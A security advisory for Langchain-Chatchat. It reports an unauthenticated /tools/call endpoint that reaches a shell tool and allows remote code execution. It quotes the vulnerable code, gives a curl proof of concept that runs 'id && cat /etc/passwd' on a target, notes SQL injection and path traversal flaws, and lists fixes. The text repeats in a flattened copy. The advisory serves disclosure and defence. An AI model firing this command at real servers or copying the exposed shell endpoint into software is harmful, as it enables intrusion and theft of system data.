Summary
Langchain-Chatchat exposes a /tools/call API endpoint with zero authentication that can invoke any registered tool by name, including the built-in shell tool which executes arbitrary OS commands via ShellTool.run(). An unauthenticated attacker with network access can achieve full Remote Code Execution.
Vulnerable Code
# server/agent/tools_factory/shell.py
@regist_tool(title="系统命令")
def shell(query: str = Field(description="The command to execute")):
tool = ShellTool()
return BaseToolOutput(tool.run(tool_input=query))
# server/api_server/server_app.py - NO authentication middleware
# tool_routes.py:33 - NO auth decorator
@tool_router.post("/call", response_model=BaseResponse)
async def call_tool(name: str = Body(...), tool_input: dict = Body({})):PoC
# Execute arbitrary commands - no authentication needed
curl -X POST http://TARGET:7861/tools/call \
-H 'Content-Type: application/json' \
-d '{"name": "shell", "tool_input": {"query": "id && cat /etc/passwd"}}'Additional Findings
- SQL Injection in
relyt_kb_service.py and pg_kb_service.py via kb_name f-string interpolation
- Path Traversal in
file_chat.py - uploaded filename used in os.path.join() without validation
- The entire API server has zero authentication/authorization on ALL endpoints
Fix
- Add authentication middleware to the FastAPI application
- Remove or disable the
shell tool in production
- If shell access is needed, implement a command allowlist
- Use parameterized queries instead of f-string SQL interpolation
Summary
Langchain-Chatchat exposes a
/tools/callAPI endpoint with zero authentication that can invoke any registered tool by name, including the built-inshelltool which executes arbitrary OS commands viaShellTool.run(). An unauthenticated attacker with network access can achieve full Remote Code Execution.Vulnerable Code
PoC
Additional Findings
relyt_kb_service.pyandpg_kb_service.pyviakb_namef-string interpolationfile_chat.py- uploaded filename used inos.path.join()without validationFix
shelltool in production